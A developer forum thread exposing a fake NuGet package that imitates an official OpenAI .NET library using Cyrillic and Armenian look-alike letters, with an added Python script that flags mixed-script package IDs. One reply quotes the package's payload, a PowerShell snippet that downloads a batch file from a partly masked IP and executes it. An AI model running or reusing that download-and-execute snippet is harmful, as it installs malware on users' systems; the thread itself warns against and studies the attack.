Problem with "Official" OpenAI .NET Package? (Edit: It's a fake package)

I’m using Visual Studio 2022 Enterprise, and I tried to install the following NuGet package:
[REMOVED BECAUSE MALICIOUS]

But I’m getting the following error:

Error MSB5016 The name “PkgOpеոAI” contains an invalid character “е”. The project file is invalid on disk and was not reloaded.

Using a Unicode character inspector such as this, it looks like instead of regular Latin characters, the “e” and “n” are actually the following:
CYRILLIC SMALL LETTER IE
ARMENIAN SMALL LETTER VO

Sooo lol what? Is that actually an official package or some kind of fake?

Edit: Ok the package now looks super sus. I think it’s a fake, there are other packages by that same account also with weird characters in them, and all created 5 days ago.

2 Likes
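The character inspection described in the post above, applied to every package ID in a project file, as an added example that is not part of the original thread. The sample project file and the package ID `Example.OpеոAI` are constructed for illustration, and a character's script is approximated by the first word of its Unicode name.

```python
import re
import unicodedata

# Constructed sample project file. The second package ID is constructed for this
# example: it swaps in U+0435 (Cyrillic ie) and U+0578 (Armenian vo), the two
# look-alike characters identified in the post above.
SAMPLE_CSPROJ = (
    '<Project Sdk="Microsoft.NET.Sdk">\n'
    '  <ItemGroup>\n'
    '    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />\n'
    '    <PackageReference Include="Example.Op\u0435\u0578AI" Version="1.0.0" />\n'
    '  </ItemGroup>\n'
    '</Project>\n'
)

PACKAGE_ID = re.compile(r'<PackageReference\b[^>]*?\bInclude\s*=\s*"([^"]+)"', re.I)


def script_of(ch):
    """Approximate script: first word of the Unicode character name."""
    return unicodedata.name(ch, "UNKNOWN").split(" ", 1)[0]


def inspect_package_id(package_id):
    """Return (offset, char, code point, Unicode name) for each non-ASCII character."""
    return [
        (i, ch, f"U+{ord(ch):04X}", unicodedata.name(ch, "UNKNOWN"))
        for i, ch in enumerate(package_id)
        if ord(ch) > 0x7F
    ]


def scan_csproj(text):
    """Map each suspicious package ID to its findings and the scripts it mixes."""
    report = {}
    for package_id in PACKAGE_ID.findall(text):
        findings = inspect_package_id(package_id)
        if findings:
            scripts = sorted({script_of(c) for c in package_id if c.isalpha()})
            report[package_id] = {"findings": findings, "scripts": scripts}
    return report


if __name__ == "__main__":
    for pkg, info in scan_csproj(SAMPLE_CSPROJ).items():
        print(f"{pkg!r} mixes scripts: {', '.join(info['scripts'])}")
        for offset, ch, cp, name in info["findings"]:
            print(f"  offset {offset}: {cp} {name}")
```

A package ID that mixes Latin with another script is the signal worth reviewing by hand before restore; an ID written entirely in one non-Latin script would also be listed by the non-ASCII check and needs a human decision.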

Looking at the file I hope you rev up your anti-virus

$URL = "http://45.###.66.##/download/Anthrax.bat"  
$FilePath = "C:\Windows\Temp\Anthrax.bat"
Invoke-WebRequest -Uri $URL -OutFile $FilePath
cmd.exe /c $FilePath
Clear-Host

There was actually a fun article regarding this exact attack vector. Did ChatGPT write this repository?

Here’s the article:

2 Likes

AppLocker saved me

2 Likes

Yeah, fake characters are usually a telltale sign of phishing. There’s been a lot of questions like “how did my API key get compromised”, and I think this is just one of the possibilities. OpenAI API keys are quite valuable now as people can use them to generate fake reviews or whatever.

I’m personally skeptical enough that I do that part myself. It’s not hard to just do a POST call and handle the errors, and it looks like even the official OpenAI ones lag behind some of the latest changes.

2 Likes

Holy moly, does NuGet even validate their packages?

Hi @ThioJoe
There are no official packages for .NET.

Only community libraries are available for C# / .NET, as of now.

Let us know if you used one of them.

2 Likes

@ThioJoe's channel was this. ← close to turning into Elon Musk :laughing:

Jokes apart, good thing it was noticed!

1 Like

Apparently not. Lesson learned :thinking:

Wow, this is crazy, idk how much malicious stuff could be uploaded.
What about PyPI?

Yep, I believe with PyPI they targeted misspellings: Latest attack on PyPI users shows crooks are only getting better | Ars Technica

1 Like

Wow, I’ve used a lot of random PyPI packages in my time, I hope I don’t get a virus :sweat_smile:
@ThioJoe what can I do to prevent that?

Haha same here, I think you can prevent using root to install stuff, that’s first, and only install known and trusted packages.